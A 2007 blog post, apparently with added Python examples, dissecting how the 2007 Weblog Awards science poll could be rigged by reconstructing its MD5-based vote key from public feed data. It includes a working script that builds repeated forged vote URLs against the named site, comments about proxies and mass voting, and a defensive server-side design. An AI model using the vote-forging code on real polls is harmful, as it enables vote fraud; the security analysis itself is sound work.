Science-Blogs@2007 Weblog Awards - Anatomy of a Break-In : 5ubliminal's TellinYa


I am more than sure that none of the owners of the sites involved condoned or suggested hacking the results. But they must have had fans with skills …

And also read the comments on each site: Pharyngula; Climate Audit 1,2 and BadAstronomy!
Damn! These scientists are haters …

What's the Science Scandal all about?

It appears that the voting in the science category of the 2007 Weblog Awards was thoroughly flawed and gamed by both sides; one side just had a bit more firepower, or so some say. I decided to verify this!

Tools of the Trade!

I needed:

  • Their Flash movie that enabled people to vote
  • A Swf Decompiler!
  • C++

The first thing was to get a copy of the Flash file handling the poll, which is referenced here in the HTML code of the page:

I needed to find where this Flash movie loaded the results (a feed) and where it cast the vote (a URL). First I was after the feed holding the internal results of the poll. After analyzing the Flash code I finally found it at the end:

I also needed a poll ID, which I had already found above in the HTML code. Next we need to see where the vote actually goes: the server-side script that handles the voting.

First wrap!

We now have the PollID = 117, the XML feed address = http:// 2007.weblogawards.org / get_poll.php?poll_id=117, and the server-side voting script = http:// 2007.weblogawards.org / poll_vote.php? poll_id=poll_id&vote=opt_id&ver=security_key.

Analyzing the results feed!

This snapshot was taken well after voting finished, and the status of the poll is still open. Look at the red marks. We also see here the ID of each entry (opt_id), which we need in the link to the server-side voting script.

We now have everything except their only security measure: the security_key that is required in the URL to vote.

Breaking the security key!

Here is how it is put together, after analyzing the swf file. We find two references to the security key, and we notice it is a simple thing:

The key is the string opt_id + "_" + BIG_S, where BIG_S is the value shown in the XML feed above (the red mark in the top right corner). That concatenation of three terms is hashed with MD5 and the 16-byte digest is written out as hex digits (00-FF), since raw binary cannot be put into the request as-is.

We now have poll_id, opt_id and sec_key, so the voting URL is trivial to build. Keep in mind that BIG_S changes every time the page (and so the feed) is loaded, so for every vote you have to load the feed first and then cast the vote with the key derived from that load.

This was easy … actually too easy! Clock time: 5 minutes, plus 10 minutes for the algorithm to actually do the work, which is now pointless and I won't code it any further. How do I know it works? Easy! Look below.

While looking at the Flash file you find that they also provide a security key check, so you know the following:

As I had both algorithms written, I checked against the feed and can produce the right key using this:
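The whole sequence described above (load the feed, read BIG_S and the opt_ids, derive the key, build the vote URL, and check a key the way the Flash movie does) as an added Python example; this is not the author's C++ code nor the site's ActionScript or PHP. The feed text is constructed for the example, since the post shows the real feed only as a screenshot: the element and attribute names are assumptions, and the `ver` attribute stands in for the value the post calls BIG_S. The host, script names and query parameters are the ones the post names.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

BASE = "http://2007.weblogawards.org"   # host and scripts named in the post

# Constructed stand-in for the results feed (not the real feed). Element and
# attribute names are assumptions; "ver" plays the role of the per-load BIG_S.
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<poll poll_id="117" status="open" ver="a3f9c1e2d4b5">
  <option opt_id="1" votes="1200">Bad Astronomy</option>
  <option opt_id="2" votes="1195">Climate Audit</option>
  <option opt_id="3" votes="800">Pharyngula</option>
</poll>
"""


def feed_url(poll_id):
    return f"{BASE}/get_poll.php?poll_id={poll_id}"


def parse_feed(xml_text):
    """Return (BIG_S, {opt_id: name}, poll status) from one load of the feed."""
    root = ET.fromstring(xml_text)
    big_s = root.attrib["ver"]
    options = {int(o.attrib["opt_id"]): o.text.strip() for o in root.findall("option")}
    return big_s, options, root.attrib.get("status")


def security_key(opt_id, big_s):
    """The 'ver' parameter as reconstructed from the SWF: hex(md5(opt_id + "_" + BIG_S)).
    Every input is public (opt_id from the feed, BIG_S from the feed), which is the
    whole weakness: any client can mint a valid key."""
    return hashlib.md5(f"{opt_id}_{big_s}".encode("ascii")).hexdigest()


def check_key(opt_id, big_s, key):
    """Local check of the kind the post says the Flash movie contains:
    recompute the key and compare."""
    return hmac.compare_digest(security_key(opt_id, big_s), key)


def vote_url(poll_id, opt_id, big_s):
    params = {"poll_id": poll_id, "vote": opt_id, "ver": security_key(opt_id, big_s)}
    return f"{BASE}/poll_vote.php?" + urlencode(params)


def plan_votes(fetch, poll_id, opt_id, count):
    """Build `count` vote requests. BIG_S changes on every feed load, so the feed
    is fetched once per vote; `fetch(url)` is injected so this runs offline.
    The URLs are returned, not requested."""
    urls = []
    for _ in range(count):
        big_s, options, status = parse_feed(fetch(feed_url(poll_id)))
        if status != "open" or opt_id not in options:
            break
        urls.append(vote_url(poll_id, opt_id, big_s))
    return urls


if __name__ == "__main__":
    # Offline run against the constructed feed; a real run would GET each URL.
    for u in plan_votes(lambda url: SAMPLE_FEED, 117, 2, 3):
        print(u)
```

The point of `plan_votes` is the one the post makes: because the only moving part (BIG_S) is handed to the client in the feed, a vote costs exactly one extra feed load, and nothing in the key ties it to a person, a session or a time.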

Steps left:

The hacker needs some proxies and can then attack the voting sequence at will, on any poll and against anyone; the more proxies he has, the better. I have full respect for both Bad Astronomy and Climate Audit, which both gamed the system, as many say, and this proves that science blogs do know science and good al-gore-ithms!

Why did security fail?

The hacking could take place during the entire voting period and for about 4 hours after the official close. For some security tips read my other post: defending your Polls and Server-Side scripts.
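Two things went wrong above: the only "secret" (BIG_S) was served to every client, so the key could be computed from public data, and the close time lived in the Flash side while the script kept accepting votes. As an added illustration, which is neither the site's code nor the contents of the author's other post, here is the shape of a server-side check in Python: the ballot token is an HMAC under a secret that never leaves the server, each token is single use, and the close time is enforced by the server. The class and method names and the per-IP cap are assumptions.

```python
import hashlib
import hmac
import secrets


class PollServer:
    """Server-side vote acceptance (assumed design, not the weblogawards code)."""

    def __init__(self, poll_id, close_time, secret=None, per_ip_limit=5):
        self.poll_id = poll_id
        self.close_time = close_time                       # enforced here, not in Flash
        self.secret = secret or secrets.token_bytes(32)    # never sent to the client
        self.per_ip_limit = per_ip_limit
        self.unused_nonces = set()
        self.votes = {}
        self.votes_by_ip = {}

    def _mac(self, nonce):
        msg = f"{self.poll_id}:{nonce}".encode("ascii")
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def issue_ballot(self, now):
        """Handed out with the results feed. Unlike BIG_S, the MAC part cannot be
        recomputed by a client because the key is the server secret."""
        if now >= self.close_time:
            return None
        nonce = secrets.token_hex(16)
        self.unused_nonces.add(nonce)
        return f"{nonce}.{self._mac(nonce)}"

    def cast_vote(self, opt_id, token, client_ip, now):
        if now >= self.close_time:
            return "closed"
        try:
            nonce, mac = token.split(".", 1)
        except ValueError:
            return "malformed"
        if not hmac.compare_digest(mac, self._mac(nonce)):
            return "bad_mac"
        if nonce not in self.unused_nonces:
            return "replay"
        if self.votes_by_ip.get(client_ip, 0) >= self.per_ip_limit:
            return "rate_limited"
        self.unused_nonces.discard(nonce)                  # single use
        self.votes[opt_id] = self.votes.get(opt_id, 0) + 1
        self.votes_by_ip[client_ip] = self.votes_by_ip.get(client_ip, 0) + 1
        return "ok"


def forged_token(opt_id, nonce):
    """What the 2007 scheme amounted to: a 'key' derived from feed data alone,
    hex(md5(opt_id + "_" + BIG_S)). Against PollServer it fails the MAC check."""
    return nonce + "." + hashlib.md5(f"{opt_id}_{nonce}".encode("ascii")).hexdigest()


if __name__ == "__main__":
    srv = PollServer(117, close_time=1000, secret=b"demo-secret")
    t = srv.issue_ballot(now=10)
    print(srv.cast_vote(2, t, "1.2.3.4", now=11))                    # ok
    print(srv.cast_vote(2, t, "1.2.3.4", now=12))                    # replay
    print(srv.cast_vote(2, forged_token(2, "deadbeef"), "1.2.3.4", now=13))  # bad_mac
    print(srv.cast_vote(1, srv.issue_ballot(now=20), "1.2.3.4", now=1000))   # closed
```

A per-IP cap is the weakest part, for the reason the post and comment #10/#11 give: proxies spread the votes out. It stops the one-machine flood; a CAPTCHA or an account, as comment #8 suggests, is what raises the cost of each extra ballot.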

21 Comments Posted By Readers :

#1 sod from Germany web
Posted on Friday, 09 November, 2007
nice analysis, very good read!

well, web polls are not the best way to poll, i guess anyway..
#2 John A from Great Britain web
Posted on Friday, 09 November, 2007
I doubt very much that any of the blog owners knew of any hacking or would have approved such hacking.
That isn't to say that someone somewhere could have decomposed the voting sequence as you have and gamed the vote.
The major part of the whole horse race was to get people to take a look at all of the blogs. That definitely
The minor part was to watch PZ Myers spontaneously explode into a glorious firework display of infantile ranting ;-)
#3 5ubliminal web
Posted on Friday, 09 November, 2007
In difficult times people reveal their real selves and, sadly, PZ failed miserably to this test of life.
I don't think owners did or supported this but I'm sure they had fans who had the skills :)
#4 ga from Australia
Posted on Friday, 09 November, 2007
Well done. Very well done. A shame that it had to happen to science blogs, but good research. Let's hope that the fans think twice next time about this sort of tactic, and play fairly and honestly. It reflects poorly on them and very badly on who they vote for and for the legitimacy of the competition. Keep it clean!
#5 bigcitylib from Canada
Posted on Friday, 09 November, 2007
Assume someone figures out your technique. Could they vote dozens of times? Hundreds? in a day.
#6 Bernie from United States
Posted on Friday, 09 November, 2007
Will this hack be traceable?
#7 5ubliminal web
Posted on Friday, 09 November, 2007
A response pack :)

@bernie: It will be but it's difficult to drop votes out of the blue (dropped votes always come along with doubts). And you can only use a number of proxies. And they can be traced!
@bigcitylib: I can code this, in 10 minutes time, to hit 2500 votes per minute or even more to anyone. It CAN!
#8 lucia from United States web
Posted on Friday, 09 November, 2007
Sheesh! Voting in two of the competitions (Tech and Science) are being examined.

I think the flimsy security reflects very poorly on Weblogs for not including elementary server side security to screen over-votes as they occurred, and decent client side security features like captchas commonly found in blog comments!

Of course, there is one benefit to the contests' complete lack of security. The thousands of post-poll votes did make the vote-bot voting obvious even to those who don't understand your description of the security hole.
#9 5ubliminal web
Posted on Friday, 09 November, 2007
Indeed Lucia. Post-close voting is perfect evidence of fraud as humans could no longer vote being locked in the Flash side.
#10 Jim B from Canada
Posted on Friday, 09 November, 2007
You generally got it all right except this part:

"The hacker needs some proxies and then can attack the voting sequence at his will on any poll on anyone. The more proxies he has the better."

You actually did not need proxies all you need was new users on the same machine and it worked fine.

Also it's not "gambled the system", it's "gaming the system"
#11 5ubliminal web
Posted on Friday, 09 November, 2007
Yes and No. First of all I'm not US or UK or EN speaker so I may make some small errors in expressing myself.

You can vote 1000s of votes with just one IP, but they are easy to spot (occurring in less than 24h) and drop. Having more than one IP actually makes it hard for the final cleaning part.
Yes, you could hit with just one IP but it's too obvious.

PS: I'd take my word for it Jim … maybe I did it ;)
#12 Jim B from Canada
Posted on Friday, 09 November, 2007
I stand corrected. I hope they publish the list of cheaters' IPs, proxies or not, so they can be investigated.

Maybe you did it? I actually did try it, but about 12 votes in a few minutes, just for proof of concept, and then stopped. I had to try as soon as I saw it was Flash; I love hacking Flash. Why anyone would use a client-side voting system is beyond me.
#13 5ubliminal web
Posted on Friday, 09 November, 2007
I code in C++. One could just decompile FLASH and recompile with vote lock stripped.
But that needed way too many clicks.

I bet that was special software written for this.
#14 Jim B from Canada
Posted on Friday, 09 November, 2007
Could you post your code? I would be interested in seeing exactly what you did.
#15 5ubliminal web
Posted on Friday, 09 November, 2007
I would … but my entire code relies on a 250.000+ lines library I built during the past 9 years.
The actual code is only 100 lines long but dependencies exceed 10.000 lines and is unusable without them.
#16 papertiger from United States
Posted on Friday, 09 November, 2007
I know it's just for study purposes, but doesn't the fact that the poll was left open past the stated closing time mean that the poll proprietor was instrumental to, and/or in league with, the cheating?
Since they are colluding, doesn't the end result reflect the way they wanted this poll to end?
#17 5ubliminal web
Posted on Friday, 09 November, 2007
This is, indeed, only for educational purposes ;)
I wouldn't say they were connected with the hackers. It ended the way someone else wanted.

For the admins of the site I only have one word made of two: Raw Incompetence and wishful thinking security.
They used the most well known security policy: This won't happen to me!
#18 lucia from United States web
Posted on Friday, 09 November, 2007
Weblogawards.com has called the race. It's a tie!

We are announcing a tie between Bad Astronomy Blog and Climate Audit, so there will be two winners in this category. Both blogs agree with this decision. We thank them both for helping resolve the issues that affected this poll as voting closed Thursday.
#19 papertiger from United States
Posted on Friday, 09 November, 2007
It occurred to me that there is one way to check. Were the other polls, for best blogger or whatnot, also open post closing time?
If they were, this supports the incompetence theory. If not, then it supports the collusion theory.
Of course it might be too late to check.
#20 lucia from United States web
Posted on Saturday, 10 November, 2007
Papertiger: If someone at WeblogsAwards voted after polls closed, that would be truly incompetent!

Anyone in control of the system should be able to add votes anytime they want. If they wanted to fix the vote, they could just add them before closing the polls!
#21 papertiger from United States
Posted on Sunday, 11 November, 2007
I'm good with the way it all shook out. Bad Astronomy and Climate Audit are both in my favorites column. :-)

And I am looking forward to the rematch next year.
5ubliminal's TellinYa.com SEM & SEO Blog © 2007 - All rights reserved unless mentioned otherwise .